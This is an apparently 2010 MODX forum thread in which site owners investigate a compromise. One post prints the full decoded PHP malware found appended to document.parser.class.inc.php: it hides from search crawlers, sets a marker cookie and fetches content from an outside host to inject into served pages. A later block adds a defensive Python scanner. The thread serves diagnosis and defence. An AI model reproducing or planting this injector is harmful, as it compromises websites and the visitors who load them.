  • Try to run this first
    http://unmaskparasites.com

    then, after that, this one; see if an iframe pops up in the source:
    http://vurldissect.co.uk/
    • Thank you wink

      but it doesn’t find anything...

      Although Unmask Parasites hasn’t found anything outright suspicious on this page, Google currently lists it as potentially dangerous*
        Free MODx Graphic resources and Templates www.tattoocms.it
        -----------------------------------------------------

        MODx IT  www.modx.it
        -----------------------------------------------------

        bubuna.com - Web & Multimedia Design
      • Have you tried the second link? That’s what detected mine, if you look at my ss in the first post.
        • I saw it as well. It was there for a while and then gone. I also found a file named help_y.php in an assets/media folder. It tries to unzip itself and eval the results, but I can’t yet tell if this is related to the iframe-inf code. This was on a little-used Evo 1.0.0 site. I’ve still got the file, but there is a data error generated when it tries to uncompress, so I can’t tell what it’s trying to eval.
          Matt
          • I found something very sus today.

            Chrome was reporting malware on the site - google webmasters tools reported nothing

            I’ve done some digging and found:

            document.parser.class.inc.php

            had

            eval(base64_decode("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"));


            tacked onto the bottom. The interesting thing is that the timestamp on the file is normal (as per the last modx update).

            That of course decodes to:

            if(function_exists("ob_start")
                && !function_exists("zaj_ebxxs")
                && !function_exists("badol_iqj")
                && !function_exists("fmi_krhz")
                && !isset($GLOBALS["ddba"])
                && @strpos(strtolower($_SERVER["HTTP_USER_AGENT"]),"googlebot") === false
                && @strpos(strtolower($_SERVER["HTTP_USER_AGENT"]),"msnbot") === false
                && @strpos(strtolower($_SERVER["HTTP_USER_AGENT"]),"yahoo") === false
                && !isset($_COOKIE["qind"]) ){
                $GLOBALS["ddba"] = 1;
                setcookie("qind", 1, time()+3600*24*2, "/");
                            function badol_iqj($gzencode_arg)
                            {
                                $x = @ord(@substr($gzencode_arg, 3, 1));
                                $shift = 10;
                                $shift2 = 0;
                                if( $x&4 )
                                {
                                    $unpack=@unpack("v", substr($gzencode_arg, 10, 2));
                                    $unpack=$unpack[1]; $shift+= 2 + $unpack;
                                }
                                if( $x&8 )
                                {
                                    $shift = @strpos($gzencode_arg, chr(0), $shift) + 1;
                                }
                                if( $x&16 )
                                {
                                    $shift = @strpos($gzencode_arg, chr(0), $shift) + 1;
                                }
                                if( $x&2 )
                                {
                                    $shift += 2;
                                }
                                $gzip = @gzinflate(@substr($gzencode_arg, $shift));
                                if($gzip === FALSE)
                                {
                                    $gzip = $gzencode_arg;
                                }
                                return $gzip;
                            }
            
                function fmi_krhz( $url ) {
            
                    if (function_exists("curl_init"))
                    {
                        $ch = curl_init($url);
                        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                        curl_setopt($ch, CURLOPT_TIMEOUT, 5);
                        $curl_result = curl_exec ($ch);
                        curl_close($ch);
                        if ($curl_result) return $curl_result;
                    }
            
            /*        if (@ini_get("allow_url_fopen"))
                    {
                        $file_result = @file_get_contents($url);
                        if ($file_result) return $file_result;
                    }   */
            
                    $url_info = parse_url($url);
                    $query  = "GET $url HTTP/1.0\r\n";
                    $query .= "Host: " . $url_info["host"] . "\r\n";
                    $query .= "Connection: Close\r\n\r\n";
                    $fp = @fsockopen($url_info["host"], 80);
                    if (!$fp) return false;
                    @fputs($fp, $query);
                    @socket_set_timeout ($fp, 5, 0);
                    $s_retcode = @substr (@fgets ($fp, 4096), 9, 3);
                    if ($s_retcode{0} <> "2") {return FALSE;}
                    while (! @feof ($fp))
                    {
                        if ("\r\n" === @fgets ($fp, 4096)) {break;}
                    }
                    $socket_result = "";
                    while (! @feof ($fp)) {
                        $socket_result .= @fgets ($fp, 4096);
                    }
                    @fclose($fp);
                    if ($socket_result) return $socket_result;
                }
                function zaj_ebxxs($uxoi) {
                    global $hvvur_xme;
                    return preg_replace("#(</table>.*<td>|</table>|</div>[^<>]*<div[^<>]*>|</body>)#is", "$1" . $hvvur_xme, badol_iqj($uxoi), 1);
                }
                $hvvur_xme = fmi_krhz(base64_decode("aHR0cDovL2djb3VudGVyLmNuL2luZm8ucGhw") . "?i=" . $_SERVER["REMOTE_ADDR"]);
                @preg_match("#<open>(.*)</close>#", $hvvur_xme, $matches);
                $hvvur_xme = isset($matches[1]) ? $matches[1] : "";
                if ($hvvur_xme) ob_start("zaj_ebxxs");
            }


            which is some nasty malware!!

            I’m one to consider my servers rather secure; I have locked them down with suPHP and Suhosin, and secured disabled functions etc. I make use of CXS for monitoring FTP and form uploads for known fingerprints and any encoded uploads...

            It didn’t detect anything; interestingly, when I run it now on my home dir it does locate the file above. So this means it was NOT uploaded via FTP. I’m thinking there’s a loose injection somewhere.

            Let me know if you need any info.

            I’m going to do a delete of all modx files and re-upload fresh, in case there are any old files (I usually use the overwrite upgrade method, so there could be old files floating around).
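A defender-side check for the injection described in this post, written here as an added example (it is not code from the thread or from MODX): it finds eval(base64_decode(...)) calls in PHP source, decodes the payload and reports which of the behaviours seen above (ob_start hooking, crawler cloaking via HTTP_USER_AGENT, the marker cookie, the outbound fetch and gzip unpacking) the payload contains, and it compares files against known-good SHA-256 digests, since the post notes the infected file kept its normal timestamp. SAMPLE_PHP, its decoded body and the indicator list are constructed for the example.

```python
import base64
import hashlib
import re
from pathlib import Path

# Injection shape reported in this thread: eval(base64_decode("...")) appended to a PHP file.
EVAL_B64 = re.compile(
    r'eval\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)\s*\)')

# Indicator strings taken from the decoded payload on this page: output-buffer hooking,
# crawler cloaking, marker cookie, outbound fetch and gzip unpacking.
INDICATORS = ("ob_start", "HTTP_USER_AGENT", "googlebot", "msnbot", "setcookie",
              "$_COOKIE", "fsockopen", "curl_init", "gzinflate", "preg_replace")

def scan_source(src):
    """Find eval(base64_decode(...)) in PHP source, decode each payload and report
    its offset, decoded length and which indicator strings it contains."""
    findings = []
    for m in EVAL_B64.finditer(src):
        try:
            payload = base64.b64decode(m.group(1), validate=True).decode("latin-1")
        except ValueError:
            payload = ""  # not valid base64: still report the eval, with no indicators
        findings.append({"offset": m.start(), "payload_len": len(payload),
                         "indicators": [i for i in INDICATORS if i in payload]})
    return findings

def verify_manifest(root, manifest):
    """Compare files with known-good SHA-256 digests (manifest: relative path -> hex).
    Returns paths that are missing or changed. The infected file in the thread kept
    its original mtime, so content hashes, not timestamps, are what to check."""
    changed = []
    for rel, digest in manifest.items():
        p = Path(root) / rel
        if not p.is_file() or hashlib.sha256(p.read_bytes()).hexdigest() != digest:
            changed.append(rel)
    return changed

# Constructed sample, not the real payload from the thread: a normal-looking file with the
# appended one-liner whose decoded body carries the page's cloaking indicators.
_SAMPLE_BODY = ('if(function_exists("ob_start") && !isset($_COOKIE["q"]) && '
                '@strpos(strtolower($_SERVER["HTTP_USER_AGENT"]),"googlebot")===false)'
                '{setcookie("q",1);}')
SAMPLE_PHP = ('<?php\nclass DocumentParser { /* normal code */ }\n?>'
              'eval(base64_decode("' + base64.b64encode(_SAMPLE_BODY.encode()).decode() + '"));')
```

Run scan_source over every *.php under the web root (Path(root).rglob("*.php")) and verify_manifest against digests taken from a clean MODX download of the same version.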
            • the same code in my document.parser.class.inc.php sad

              eval(base64_decode("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
              • Quote from: banzai at Aug 05, 2010, 01:15 PM

                the same code in my document.parser.class.inc.php sad

                eval(base64_decode("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


                Can you advise if the file time stamp is different than the surrounding files?
                • The time stamp is the same as the other modx files (last modx update) sad
                  • I recall a rash of compromises from an Acrobat related security hole a while back. They basically logged your passwords and forwarded them on, giving folks "regular" access to the system that way.
                      Ryan Thrash, MODX Co-Founder
                      Follow me on Twitter at @rthrash or catch my occasional unofficial thoughts at thrash.me
                    • Quote from: rthrash at Aug 05, 2010, 02:00 PM

                      I recall a rash of compromises from an Acrobat related security hole a while back. They basically logged your passwords and forwarded them on, giving folks "regular" access to the system that way.

                      I’ve gone through the FTP logs; there are no entries from anyone other than myself. That file hasn’t been touched via FTP since I uploaded it during my last update.

                      Any other ideas? Bit odd that we both have the same file infected; modx is the only software running under this webroot.

                      I can’t see any calls in the https logs to the file directly.